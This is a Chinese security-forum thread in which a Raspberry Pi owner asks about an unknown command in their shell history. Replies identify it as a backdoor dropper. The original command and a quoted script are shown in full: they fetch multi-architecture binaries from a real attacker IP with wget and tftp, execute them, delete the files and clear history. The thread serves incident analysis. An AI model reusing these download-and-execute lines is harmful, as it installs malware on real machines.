吾爱破解 - 52pojie.cn

 找回密码
 注册[Register]

QQ登录

只需一步,快速开始

查看: 3501|回复: 8
收起左侧

【求助】树莓派不知道执行了什么脚本

[复制链接]
爱丽丝小黄鸡 发表于 2019-12-15 21:57
使用论坛附件上传样本压缩包时必须使用压缩密码保护,压缩密码:52pojie,否则会导致论坛被杀毒软件等误报,论坛有权随时删除相关附件和帖子!
病毒分析分区附件样本、网址谨慎下载点击,可能对计算机产生破坏,仅供安全人员在法律允许范围内研究,禁止非法用途!
禁止求非法渗透测试、非法网络攻击、获取隐私等违法内容,即使对方是非法内容,也应向警方求助!
打开终端后,习惯性按了一下。发现没有看到过的一条命令。
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://104.248.95.152/SnOoPy.sh; chmod 777 *; sh SnOoPy.sh; tftp -g 104.248.95.152 -r tftp1.sh; chmod 777 *; sh tftp1.sh; rm -rf *.sh; history -c
求大神说一下这个是什么。

发帖前要善用论坛搜索功能,那里可能会有你要找的答案或者已经有人发布过相同内容了,请勿重复发帖。

涛之雨 发表于 2019-12-15 22:19
这貌似是基本指令???
emmm可以试一下那个格盘的指令
RuMeng 发表于 2019-12-15 22:19
MaxMadcc 发表于 2019-12-15 22:35
SnOoPy.sh会去下载一些elf然后执行,应该是个后门
cxw0102 发表于 2019-12-15 22:37
sh的代码:
#!/bin/bash
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://104.248.95.152/m-i.p-s.SNOOPY; chmod +x m-i.p-s.SNOOPY; ./m-i.p-s.SNOOPY; rm -rf m-i.p-s.SNOOPY
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://104.248.95.152/m-p.s-l.SNOOPY; chmod +x m-p.s-l.SNOOPY; ./m-p.s-l.SNOOPY; rm -rf m-p.s-l.SNOOPY
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://104.248.95.152/s-h.4-.SNOOPY; chmod +x s-h.4-.SNOOPY; ./s-h.4-.SNOOPY; rm -rf s-h.4-.SNOOPY
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://104.248.95.152/x-8.6-.SNOOPY; chmod +x x-8.6-.SNOOPY; ./x-8.6-.SNOOPY; rm -rf x-8.6-.SNOOPY
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://104.248.95.152/a-r.m-6.SNOOPY; chmod +x a-r.m-6.SNOOPY; ./a-r.m-6.SNOOPY; rm -rf a-r.m-6.SNOOPY
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://104.248.95.152/x-3.2-.SNOOPY; chmod +x x-3.2-.SNOOPY; ./x-3.2-.SNOOPY; rm -rf x-3.2-.SNOOPY
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://104.248.95.152/a-r.m-7.SNOOPY; chmod +x a-r.m-7.SNOOPY; ./a-r.m-7.SNOOPY; rm -rf a-r.m-7.SNOOPY
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://104.248.95.152/p-p.c-.SNOOPY; chmod +x p-p.c-.SNOOPY; ./p-p.c-.SNOOPY; rm -rf p-p.c-.SNOOPY
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://104.248.95.152/i-5.8-6.SNOOPY; chmod +x i-5.8-6.SNOOPY; ./i-5.8-6.SNOOPY; rm -rf i-5.8-6.SNOOPY
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://104.248.95.152/m-6.8-k.SNOOPY; chmod +x m-6.8-k.SNOOPY; ./m-6.8-k.SNOOPY; rm -rf m-6.8-k.SNOOPY
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://104.248.95.152/p-p.c-.SNOOPY; chmod +x p-p.c-.SNOOPY; ./p-p.c-.SNOOPY; rm -rf p-p.c-.SNOOPY
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://104.248.95.152/a-r.m-4.SNOOPY; chmod +x a-r.m-4.SNOOPY; ./a-r.m-4.SNOOPY; rm -rf a-r.m-4.SNOOPY
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://104.248.95.152/a-r.m-5.SNOOPY; chmod +x a-r.m-5.SNOOPY; ./a-r.m-5.SNOOPY; rm -rf a-r.m-5.SNOOPY
wangyujie96 发表于 2019-12-15 22:45
2333,那个sh文件下载下来就被火绒sha掉了,100%肯定楼主中毒了
mzussle 发表于 2019-12-15 22:55
刚复制粘贴就报毒   有点意思
yushangwl 发表于 2019-12-15 23:28
这个文件emmm
头像被屏蔽
洛枫 发表于 2019-12-15 23:46
提示: 作者被禁止或删除 内容自动屏蔽
您需要登录后才可以回帖 登录 | 注册[Register]

本版积分规则

返回列表

RSS订阅|小黑屋|处罚记录|联系我们|吾爱破解 - LCG - LSG ( 京ICP备16042023号 | 京公网安备 11010502030087号 )

GMT+8, 2024-11-24 15:30

Powered by Discuz!

Copyright © 2001-2020, Tencent Cloud.

快速回复 返回顶部 返回列表